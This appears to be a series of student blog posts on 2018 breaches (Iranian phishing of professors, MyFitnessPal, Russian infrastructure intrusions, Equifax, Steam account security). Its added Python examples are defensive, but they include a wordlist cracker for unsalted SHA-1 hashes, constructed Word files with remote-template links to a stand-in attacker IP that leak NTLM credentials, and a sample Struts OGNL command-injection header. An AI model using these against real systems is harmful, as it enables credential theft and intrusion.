Iranian Hackers Target US Professors

On March 23, 2018 the Justice Department charged nine Iranians with multiple counts of identity theft and conspiracy to commit computer intrusions. The main targets were professors at US and foreign universities; other targets included US- and European-based private companies and several government agencies. The accused were affiliated with the Mabna Institute and were said to have acted at the behest of an Iranian intelligence agency. The US Attorney who brought the case said the Mabna Institute may look legitimate, but that it exists for the sole purpose of stealing scientific resources from around the world. The group sent phishing emails that appeared to come from other universities to more than 100,000 professor accounts worldwide and compromised about 8,000 of them; the lures typically posed as a fellow academic asking for a published article, with a link to a spoofed university login page that captured the victim's credentials. They also compromised at least 37 US-based companies, 11 European companies, and at least five government agencies and organizations, including the Labor Department, the Federal Energy Regulatory Commission, and the United Nations. Over a campaign dating back to 2013 the hackers stole more than 31 terabytes of data, valued at roughly $3 billion in intellectual property. The Justice Department has said the nine defendants remain at large.

–  Owen Ryan

Sources:

https://www.cnbc.com/2018/03/23/us-indicts-iranian-nationals-in-iran-government-backed-scheme-on-us-universities.html

https://www.wired.com/story/iran-cyberattacks-us-universities-indictment/


Under Armour: MyFitnessPal Hack

On March 25, 2018, Under Armour learned of a breach that had taken place in late February 2018. The company announced that about 150 million MyFitnessPal accounts were affected. Because the app never asks for Social Security numbers or driver's license numbers, and payment cards are collected and processed separately, none of that data was exposed. The stolen data consists of usernames, the email address associated with each account, and hashed passwords. Hashed is not the same as encrypted: a hash cannot be decrypted back into the password, but an attacker holding the dump can guess candidate passwords offline and compare the results against the stolen hashes, so weak or common passwords will fall. Under Armour's notice said most passwords were hashed with bcrypt, which is designed to make that guessing slow, while the remainder used SHA-1, which is fast and therefore much easier to attack. The practical point is that the attackers do not yet have plaintext passwords for every account, so users still have time to change them. Because many people reuse the same username and password across sites and applications, they should also change that password anywhere else it is used. The risk from the breach does not end there: with the email addresses, attackers can send phishing messages that appear to come from the fitness app. Under Armour said it is working with data security firms and law enforcement but gave no details on how the attackers got into its network or pulled the data out without being caught in the act.
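To make the hashed-versus-encrypted point concrete, here is an added example (not Under Armour's code, and not MyFitnessPal data): a constructed dump of four accounts hashed with bare SHA-1 is cracked against a tiny wordlist, and one record protected with a salted, slow scheme is attacked the same way. PBKDF2-HMAC-SHA256 from the standard library stands in for bcrypt here, since the design point is the same: a per-user random salt plus a tunable work factor. The email addresses, passwords, wordlist and the 50,000-round cost are all assumptions chosen for the demo.

```python
import hashlib
import hmac
import os
from typing import Dict, Iterable, List, Optional, Tuple

# Constructed sample wordlist of common passwords (an attacker's first guesses).
WORDLIST: List[str] = ["123456", "password", "letmein", "fitness2018", "myfitnesspal"]


def sha1_unsalted(password: str) -> str:
    """Weak legacy scheme: one fast SHA-1 over the password, no salt."""
    return hashlib.sha1(password.encode("utf-8")).hexdigest()


def slow_salted(password: str, salt: Optional[bytes] = None, rounds: int = 50_000) -> str:
    """Slow, salted scheme.  PBKDF2-HMAC-SHA256 stands in for bcrypt (assumed cost
    of 50,000 rounds).  The output is self-describing so the verifier can recover
    the salt and cost later."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, rounds)
    return f"pbkdf2${rounds}${salt.hex()}${dk.hex()}"


def verify_slow(password: str, stored: str) -> bool:
    """Recompute with the stored salt and cost, then compare in constant time."""
    _, rounds, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                             bytes.fromhex(salt_hex), int(rounds))
    return hmac.compare_digest(dk, bytes.fromhex(dk_hex))


def crack_sha1_dump(dump: Dict[str, str], wordlist: Iterable[str]) -> Dict[str, str]:
    """Offline attack on an unsalted dump {email: sha1_hex}.  Each guess is hashed
    once and compared against EVERY account at the same time, because without a
    salt identical passwords produce identical hashes."""
    by_hash: Dict[str, List[str]] = {}
    for email, h in dump.items():
        by_hash.setdefault(h, []).append(email)
    cracked: Dict[str, str] = {}
    for guess in wordlist:
        for email in by_hash.get(sha1_unsalted(guess), []):
            cracked[email] = guess
    return cracked


def crack_slow_record(stored: str, wordlist: Iterable[str]) -> Tuple[Optional[str], int]:
    """Offline attack on ONE salted record.  Returns (password or None, number of
    PBKDF2 evaluations spent).  The salt forces this cost to be paid per account."""
    work = 0
    for guess in wordlist:
        work += 1
        if verify_slow(guess, stored):
            return guess, work
    return None, work


# Constructed sample dump (not real data): four accounts hashed with bare SHA-1.
SHA1_DUMP: Dict[str, str] = {
    "alice@example.com": sha1_unsalted("fitness2018"),
    "bob@example.com": sha1_unsalted("letmein"),
    "carol@example.com": sha1_unsalted("Tr0ub4dor&3-not-in-wordlist"),
    "dave@example.com": sha1_unsalted("letmein"),  # same password as bob -> same hash
}


def demo() -> Tuple[Dict[str, str], Tuple[Optional[str], int]]:
    """Crack the SHA-1 dump, then one salted record holding 'letmein'."""
    cracked = crack_sha1_dump(SHA1_DUMP, WORDLIST)
    record = slow_salted("letmein")
    return cracked, crack_slow_record(record, WORDLIST)


if __name__ == "__main__":
    cracked, (pw, work) = demo()
    print("unsalted SHA-1: cracked", cracked)
    print(f"salted PBKDF2: recovered {pw!r} after {work} evaluations for ONE record")
```

Two things to notice when running it: bob and dave share a hash, so cracking one cracks both for free, and the salted record costs its own full run of guesses, which is the cost bcrypt imposes on the attacker for every single account in the 150 million.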

 

Sources:

https://www.reuters.com/article/us-under-armour-databreach/under-armour-says-150-million-myfitnesspal-accounts-breached-idUSKBN1H532W

https://www.slashgear.com/under-armour-myfitnesspal-hack-5-things-to-know-30525418/

-Noor Mohammad


Russian Government Cyber Attacks Targeting Critical US Infrastructure

In this technology-driven age, one nation hacking another is an increasingly common form of attack. The United States Computer Emergency Readiness Team (US-CERT), jointly with DHS and the FBI, recently released an alert outlining specific techniques the Russian government has used against the U.S. government and “organizations in the energy, nuclear, commercial facilities, water, aviation, and critical manufacturing sectors”. The alert states that this activity has been ongoing since at least March 2016.

One technique uses spear-phishing emails carrying Microsoft Word attachments. The document needs no macro: it contains a reference to a file on an attacker-controlled server that Word tries to fetch over SMB when the document is opened. Whether or not the file exists, Windows transparently attempts to authenticate to that server, often without any prompt, and in doing so hands the attacker the user's hashed NTLM credentials. The attackers then work those hashes offline to recover the username and plaintext password; the alert identifies Hydra and CrackMapExec among the tools the group used with harvested credentials. The alert's corresponding mitigation is to block outbound SMB (TCP 445 and 139, UDP 137 and 138) at the network boundary, so that a document cannot make a workstation authenticate to a host on the internet.
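A .docx is a zip of XML parts, and the usual carrier for the remote-file trick described above is a relationship entry whose target is a file:// URL or a \\host\share UNC path. The following is an added example, not from the alert or from any vendor: a small scanner that opens a .docx, walks every relationships part, reports every relationship marked External, and separately flags the ones that would make Word authenticate over SMB. The sample documents are constructed inline; the attacker address 203.0.113.5 and the template paths are assumptions for the demo.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from typing import List, Optional, Tuple

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
R_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"

# A file:// URL or a \\host\share UNC path: Word fetches these over SMB and
# Windows will authenticate to the remote host while doing so.
SMB_TARGET = re.compile(r"^(file:|\\\\)", re.IGNORECASE)


def external_relationships(docx: bytes) -> List[Tuple[str, str, str]]:
    """Return (rels part, relationship type, target) for every relationship in
    the package whose TargetMode is External, whichever part it belongs to."""
    found: List[Tuple[str, str, str]] = []
    with zipfile.ZipFile(io.BytesIO(docx)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                if rel.get("TargetMode") == "External":
                    rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                    found.append((name, rel_type, rel.get("Target", "")))
    return found


def smb_beacons(docx: bytes) -> List[Tuple[str, str, str]]:
    """Only the external relationships that would trigger SMB authentication."""
    return [r for r in external_relationships(docx) if SMB_TARGET.match(r[2])]


def build_docx(template_target: Optional[str]) -> bytes:
    """Constructed minimal .docx for testing (not a real document).  When a
    target is given, word/settings.xml carries an attachedTemplate relationship
    pointing at it, which is the layout the remote-template trick relies on."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/document.xml", f'<w:document xmlns:w="{W_NS}"><w:body/></w:document>')
        settings = f'<w:settings xmlns:w="{W_NS}" xmlns:r="{R_NS}">'
        if template_target is not None:
            settings += '<w:attachedTemplate r:id="rId1"/>'
            z.writestr("word/_rels/settings.xml.rels",
                       f'<Relationships xmlns="{RELS_NS}">'
                       f'<Relationship Id="rId1" Type="{R_NS}/attachedTemplate" '
                       f'Target="{template_target}" TargetMode="External"/></Relationships>')
        settings += "</w:settings>"
        z.writestr("word/settings.xml", settings)
    return buf.getvalue()


# Constructed samples.  203.0.113.5 is a documentation address standing in for
# an attacker host; intranet.example.com stands in for a legitimate template server.
BENIGN = build_docx(None)
HTTPS_TEMPLATE = build_docx("https://intranet.example.com/templates/letter.dotx")
SMB_TEMPLATE = build_docx("file://203.0.113.5/templates/normal.dotm")
UNC_TEMPLATE = build_docx("\\\\203.0.113.5\\templates\\normal.dotm")


if __name__ == "__main__":
    for label, doc in [("benign", BENIGN), ("https", HTTPS_TEMPLATE),
                       ("file-url", SMB_TEMPLATE), ("unc", UNC_TEMPLATE)]:
        print(f"{label:9} external={external_relationships(doc)} smb={smb_beacons(doc)}")
```

An HTTPS template is reported as external but not as an SMB beacon, which is the distinction a mail gateway rule should make: external templates are unusual enough to review, but a file:// or UNC target in an inbound attachment is the credential-leak case and should be blocked outright.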

Another technique also used phishing to obtain credentials, this time via a link in a fake .pdf contract agreement. Users were directed to follow the link and enter their email address and password in order to agree to the service contract. Once the credentials were in hand, the attackers used them to try to gain access to the internal systems of these infrastructure operators. A backdoor was installed for persistent access, after which the attackers could modify firewall settings and Windows registry keys.

The release of this information is significant in two ways. First, it is yet another example of the importance of vigilant security awareness and practice. Both attacks depend on an inattentive end user to get in, but they differ in how much the user has to do: in the contract scam the user types a password into the attacker's form, while in the Word attack simply opening the unsolicited document is enough, because the credential hash leaks without any further action. In both cases the user never asks whether the requesting source is legitimate.

Second, it is another example of the changing landscape of cyber security as hacking is used more and more often by governments as a weapon against other nations. Now more than ever, security awareness matters for everyone as we enter an age of online warfare.

— Brendon Stowe
Student, R•I•T
Web & Mobile Computing


Source:
Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors (US-CERT Alert TA18-074A)

Equifax Breach Impacts An Additional 2.4 Million

Equifax has managed to come back into the news. Three weeks ago (March 1, 2018) Equifax released an update on the breach it disclosed six months earlier. For those who do not know, Equifax is one of the three major credit reporting agencies in the United States. Most consumer credit activity, including bank accounts, loans, and credit cards, is reported to at least one of these agencies, so almost everyone in the United States has a file with one of them, if not all three. I will go further in depth on the security issues Equifax dealt with during the summer of 2017 and in September, but first the most recent update.

Equifax originally announced that 143 million people had their personal information stolen, a figure it revised to 145.5 million in October 2017. The information includes names, SSNs, birthdates, and addresses, plus driver's license numbers and credit card numbers for a subset of victims. The population of the United States is 325.7 million (2017), so nearly half of all Americans (44.67%) had their information stolen. Since the breach really only affects adults, as children have had little reason to appear in Equifax's files, the share of adults is over 50%. The new update added another 2.4 million people. That number is much smaller than the original, but it comes six months after the initial announcement: the hackers have held the personal information of those 2.4 million people for nine months (the six since the announcement plus the three it took to tell the public at all, more on that later) without those people knowing. With this update the total reaches 147.9 million, roughly 58% of all adult Americans. It is one of the largest thefts of personal information in history.

The intrusion itself happened between mid-May and late July 2017 and began with a known flaw in Apache Struts 2, the web application framework behind Equifax's consumer dispute portal. The vulnerability, CVE-2017-5638, had a patch available since March 2017, two months before the attackers first used it. That flaw gave the hackers their initial access to Equifax's systems; by the time they were finished they had 30 separate entry points. The only reason they were caught is that they were so deeply embedded that the company was forced to take the dispute portal offline for 11 days while the security team worked out what was happening.

There are also reports that the company had been warned six months before the intrusion (December 2016) that its defenses were weak. An anonymous security researcher found a flaw in one of Equifax's websites that would let anyone pull the records of everyone in the database, including SSNs, names, and birthdates, in a couple of minutes. The flaw was reachable through forced browsing: requesting pages or record identifiers directly by URL, including ones the site never links to, with no check that the requester is entitled to see them. The same researcher also reportedly found ways to get shell access on several Equifax servers, as well as several SQL injection vulnerabilities. Reading across the coverage, Equifax's main security policy appears to have been “security by obscurity”.
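Both of the weaknesses just described, the Struts flaw and the forced-browsing hole, leave traces in ordinary web server logs. The following is an added example, not code from Equifax or from any of the sources: two detections run over a handful of constructed log lines. The first flags requests carrying an OGNL expression in the Content-Type header, which is where CVE-2017-5638 exploitation of the Struts multipart parser puts its payload; the second flags a client that walks record identifiers sequentially, the signature of forced browsing against unprotected records. The log format, paths, and addresses are assumptions; the OGNL sample is a shortened illustration of the expression shape, not a working exploit.

```python
import re
from collections import defaultdict
from typing import Dict, List, Set

# Constructed sample access-log lines (not Equifax's logs).
# Format: client_ip method path status "Content-Type request header"
SAMPLE_LOG = r'''
198.51.100.7 POST /ACIS/upload 200 "multipart/form-data; boundary=----xyz"
198.51.100.9 POST /ACIS/upload 200 "%{(#_='multipart/form-data').(#cmd='whoami').(#p=new java.lang.ProcessBuilder(#cmd))}"
203.0.113.4 GET /dispute/view?id=10021 200 "-"
203.0.113.4 GET /dispute/view?id=10022 200 "-"
203.0.113.4 GET /dispute/view?id=10023 200 "-"
203.0.113.4 GET /dispute/view?id=10024 200 "-"
203.0.113.4 GET /dispute/view?id=10025 200 "-"
203.0.113.4 GET /dispute/view?id=10026 200 "-"
192.0.2.10 GET /dispute/view?id=10501 200 "-"
192.0.2.10 GET /dispute/view?id=10501 200 "-"
192.0.2.10 GET /dispute/view?id=77 200 "-"
'''

LINE = re.compile(r'^(\S+) (\S+) (\S+) (\d{3}) "(.*)"$')
# An OGNL expression (%{...} or ${...}) referencing a #variable where a plain
# media type belongs is the marker of CVE-2017-5638 exploitation attempts.
OGNL = re.compile(r"[%$]\{.*#")
ID_PARAM = re.compile(r"[?&]id=(\d+)")


def parse(log: str) -> List[Dict[str, str]]:
    """Split the constructed log into dicts; lines that do not match are dropped."""
    rows = []
    for line in log.strip().splitlines():
        m = LINE.match(line)
        if m:
            ip, method, path, status, ctype = m.groups()
            rows.append({"ip": ip, "method": method, "path": path,
                         "status": status, "ctype": ctype})
    return rows


def struts_ognl_attempts(rows: List[Dict[str, str]]) -> List[str]:
    """Clients that sent an OGNL expression in the Content-Type header."""
    return sorted({r["ip"] for r in rows if OGNL.search(r["ctype"])})


def forced_browsing(rows: List[Dict[str, str]], min_ids: int = 5,
                    consecutive_share: float = 0.8) -> List[str]:
    """Clients enumerating record ids: at least min_ids distinct ids requested,
    and at least consecutive_share of the gaps between the sorted ids equal 1.
    Repeated requests for the same id do not count as enumeration."""
    ids_by_ip: Dict[str, Set[int]] = defaultdict(set)
    for r in rows:
        m = ID_PARAM.search(r["path"])
        if m:
            ids_by_ip[r["ip"]].add(int(m.group(1)))
    flagged = []
    for ip, ids in ids_by_ip.items():
        if len(ids) < min_ids:
            continue
        ordered = sorted(ids)
        gaps = [b - a for a, b in zip(ordered, ordered[1:])]
        if sum(g == 1 for g in gaps) / len(gaps) >= consecutive_share:
            flagged.append(ip)
    return sorted(flagged)


if __name__ == "__main__":
    rows = parse(SAMPLE_LOG)
    print("Struts OGNL injection attempts from:", struts_ognl_attempts(rows))
    print("Sequential record enumeration from:", forced_browsing(rows))
```

The enumeration check keys on distinct ids and on how consecutive they are, so a user who reloads the same dispute page is not flagged while a client that steps through id after id is. Tune min_ids to the site: a legitimate back-office user may open a dozen records an hour, an enumerator opens thousands.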

Now, most people think the only issue was the breach between mid-May and July. That is only part of Equifax's downfall. Besides announcing 2.4 million additional victims nine months after the incident, Equifax is credited with many mistakes that a student in CSEC 101 could have prevented. But first, let's go over how Equifax handled the situation.

In late July 2017, Equifax learned that it had been breached. The company then waited about six weeks to tell the public. That meant the attackers had held the personal information of well over a hundred million people for roughly three months, and Equifax sat on the news for over a month of that. Before announcing the breach, top executives at Equifax sold nearly $2 million worth of stock. Perhaps the one good practice was offering a year of credit protection to anyone affected, but even that had its downsides. In most cases a year is not enough: given the kind of information leaked and how long it stays useful, the fraud against an individual may not happen for another 5 to 10 years. What's more, under the enrollment terms as initially reported, once the free year ran out you were automatically rolled into the paid protection plan whether you asked to be or not, and had to cancel manually when the year expired. Also, by agreeing to the plan you entered into an arbitration agreement with Equifax that appeared to waive your right to sue the company. Equifax later updated this, allowing anyone who signed up to opt out by sending a written letter within 30 days.

To find out whether you were affected, Equifax required you to go to a newly registered site (https://www.equifaxsecurity2017.com) and enter your last name and the last six digits of your SSN. And I wish I could say Equifax stopped messing up there, but the story continues. Security experts criticized Equifax for creating this website at all. It would have been far safer to use a subdomain of equifax.com, which customers already know and which a phisher cannot register, and have people enroll there. Equifax should have listened. A software engineer decided to show the world exactly what could go wrong. He registered securityequifax2017.com (it has since been taken down), copied the real Equifax site, and added the line “Which is Totally Fake, Why Did Equifax Use A Domain That's So Easily Impersonated By Phishing Sites?” to the title of the page (shown below).

The site was “convincing” enough that Equifax's official Twitter account linked to it, not once, no, that's not the Equifax way, but seven times. Equifax's own account pointed customers at a site built specifically to demonstrate the risk of a long, unfamiliar URL, and whose title read “Which is Totally Fake, Why Did Equifax Use A Domain That's So Easily Impersonated By Phishing Sites?”. Some 200,000 people had reached the fake site before its creator took it down, proving his point.
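The engineer's stunt works because equifaxsecurity2017.com is just three tokens glued together, and a phisher can reorder, hyphenate, or misspell them at will. Here is an added example of the check a brand-protection or mail-filtering team would run (not Equifax's code, and not from either source): a candidate hostname is classified as legitimate if it is the brand's own domain or a subdomain of it, as a lookalike if its registrable label is a reordering of the campaign's tokens or within a couple of edits of one, and as unrelated otherwise. The brand domain, token list, and candidate names are assumptions for the demo.

```python
import itertools
from typing import List, Set


def levenshtein(a: str, b: str) -> int:
    """Edit distance; catches one-character swaps such as 0 -> o."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable_label(host: str) -> str:
    """'www.equifaxsecurity2017.com' -> 'equifaxsecurity2017'.  Naive: the label
    before the last one; adequate for .com-style names used in this demo."""
    parts = host.lower().strip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def token_variants(tokens: List[str]) -> Set[str]:
    """Every ordering of the campaign's tokens, joined with nothing, '-' or '_'."""
    out: Set[str] = set()
    for perm in itertools.permutations(tokens):
        for sep in ("", "-", "_"):
            out.add(sep.join(perm))
    return out


def classify(candidate: str, brand_domains: List[str], tokens: List[str],
             max_edits: int = 2) -> str:
    """Return 'legitimate', 'lookalike' or 'unrelated' for a hostname."""
    host = candidate.lower().rstrip(".")
    for brand in brand_domains:
        b = brand.lower()
        if host == b or host.endswith("." + b):
            return "legitimate"          # the brand's own domain or a subdomain of it
    label = registrable_label(host)
    variants = token_variants(tokens)
    if label in variants or any(levenshtein(label, v) <= max_edits for v in variants):
        return "lookalike"
    return "unrelated"


# Assumed inputs for the demo: the brand's real domain and the campaign site's tokens.
BRAND = ["equifax.com"]
TOKENS = ["equifax", "security", "2017"]

if __name__ == "__main__":
    for name in ["www.equifax.com", "breach.equifax.com", "equifaxsecurity2017.com",
                 "securityequifax2017.com", "equifax-security2017.com",
                 "equifaxsecurity2o17.com", "secureequifax2017.com", "example.com"]:
        print(f"{name:28} {classify(name, BRAND, TOKENS)}")
```

The instructive result is that the real campaign site, equifaxsecurity2017.com, classifies exactly the same as the fake one: from the outside there is nothing to tell them apart, which is the whole argument for a subdomain of the brand's domain. The last sample also shows the limit of this check: a synonym swap (secure for security) is three edits away and slips past it, so a real deployment pairs token permutations with a wordlist of likely substitutions.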

Next on the list: Equifax's website in Argentina. This was a separate problem that happened to surface at the same time the breach news was breaking. A cybersecurity firm testing the strength of Equifax's sites found that the employee portal for the database holding the South American employee information used the username and password admin/admin. With that login, the firm was able to see the Argentine national ID numbers (the equivalent of SSNs), names, and emails of over 100 Equifax employees.

– Michael


Why are my Video Games Safer Than my Bank Account?

Valve Software has built one of the most widely used two-factor authentication (2FA) systems in the world: its mobile app handles 2FA for accounts on Steam, its PC gaming platform. Valve pushed adoption by placing limitations on accounts that do not enable it. Those limitations mostly concern trading: tradeable copies of games and in-game items such as weapon skins, hats, and loot boxes. These items have grown into a full-blown economy, with users relying on ordinary supply and demand to trade with each other on Steam or through third-party sites. In Valve's own games most items can only be obtained at random from a paid loot-box system, with rarity tiers deciding how likely an item is to drop. With supply limited by how much money users are willing to put into digital items, and demand resting mostly on how the items look and how rare they are, many are worth over $100 and some well over $1,000.

Naturally we ask: how does a video game company with about 400 employees give its users better account security, on average, than most online banking? In 2012 Valve had none of these protections in place, so what drove it to force users' hands? Valve's answer was fraud. As the items grew popular, people posed as Valve staff or used phishing sites to get users' passwords. These attacks were rampant in 2012, and it was nearly impossible to find a Steam account that did not have bots posting phishing links in its comments. Valve's first step was 2FA over email, and it required users to confirm trades by email as well. This limited how much damage someone could do with a stolen Steam login, since they still could not trade without access to the email account.

Obviously this wasn't the end of the story; phishers were making tens of thousands of dollars and weren't planning to stop. They turned to malware built specifically to gather email login information and the local Steam session files, often spread disguised as popular communication programs. One personal encounter: someone asked me to join their game, saying they were playing in a tournament and needed an extra player. I was a bit on guard, and they asked me to join their voice server. The user gave me a link to what looked like the site for the voice client, but it was actually a fake. I caught it because it claimed to be a newer version than the one I had downloaded from the real site, and the download was a lot smaller. At that point I knew it was a scam, but I was amazed by how well orchestrated it was. This was around the time Valve moved all authentication to its mobile app, temporarily locking accounts when the authenticator changed and requiring all trades to be confirmed through it, or else leaving them pending for 3 days.

Valve now has some of the toughest required account security features in the industry. Its reasoning? To cut down on support having to duplicate items for people who were scammed. While account phishing was a problem for users, Valve was practically forced to restore the item to the victim, because the original had usually already been sold on, for real money or other items, and could not be deleted without punishing innocent buyers. With mandatory 2FA and account limitations, an attacker can no longer move items out of an account without the owner being alerted. At best the attacker might get 2FA removed and trade the item after an 18-day hold, but by then the user would usually have noticed.

Steam accounts are safer than most bank accounts because Valve does not want its in-game economy upset. That only makes me wonder why banks don't do the same; even Bank of America will let you transfer all your money online without a single 2FA check or notification.

-Tyler Hart

https://support.steampowered.com/kb_article.php?ref=8625-wrah-9030

https://www.kotaku.com.au/2016/03/steam-users-think-valves-new-trading-restrictions-go-too-far/